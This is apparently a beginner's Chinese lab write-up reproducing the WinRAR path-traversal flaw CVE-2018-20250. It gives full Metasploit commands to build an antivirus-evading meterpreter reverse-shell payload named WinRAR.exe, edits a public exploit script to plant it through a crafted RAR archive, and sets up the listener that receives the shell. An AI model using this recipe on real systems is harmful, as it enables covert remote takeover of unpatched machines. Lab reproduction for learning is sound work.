'WinRAR目录穿越漏洞复现(CVE-2018-20250)'

1.漏洞细节

https://research.checkpoint.com/extracting-code-execution-from-winrar/

2.漏洞影响版本

WinRAR < 5.70 Beta 1

Bandizip < = 6.2.0.0

好压(2345压缩) < = 5.9.8.10907

360压缩 < = 4.0.0.1170

3.漏洞复现环境

角色 系统版本 IP 备注
靶机 Windows7(64bit) 192.168.126.128 安装WinRAR版本为5.6.1,关闭防火墙
攻击机 Kali Linux 64 Bit 2019.1a 192.168.126.126 Metasploit版本为5.0.2
攻击机 WIndows10(64bit) 安装Python3.7.2

exp下载:https://github.com/WyAtu/CVE-2018-20250/

4.漏洞复现过程

4.1使用Metasploit5生成免杀Payload

1
2
3
4
5
6
7
8
9
msfconsole
use evasion/windows/windows_defender_exe
show info
set filename WinRAR.exe
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.126.126
set lport 10260
run

4.2使用exp生成恶意程序

1
2
3
4
5
cd /root/Desktop
git clone https://github.com/WyAtu/CVE-2018-20250.git
cd CVE-2018-20250
cp /root/.msf4/local/WinRAR.exe ./
vim exp.py

将exp.py中的evil_filename = “calc.exe”改为”WinRAR.exe”

将CVE-2018-20250文件夹复制到Windows10中,执行

1
python exp.py

生成恶意程序test.rar

4.3在靶机上运行恶意程序

将test.rar复制到Windows7上,解压运行

4.4在Kali Linux上执行Metasploit监听

1
2
3
4
5
6
7
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.126.126
set lport 10260
run

4.5控制靶机

Windows7重启之后,Kali Linux会收到会话,此时执行shell即可获得靶机权限。

5.总结

刚刚学了2个星期的渗透测试,仅仅做了漏洞复现,没有分析漏洞原理。

6.参考文章

[1] Extracting a 19 Year Old Code Execution from WinRAR

[2] WinRAR目录穿越漏洞浅析及复现(CVE-2018-20250)

[3] WinRAR远程代码执行漏洞结合Metasploit+Ngrok实现远程上线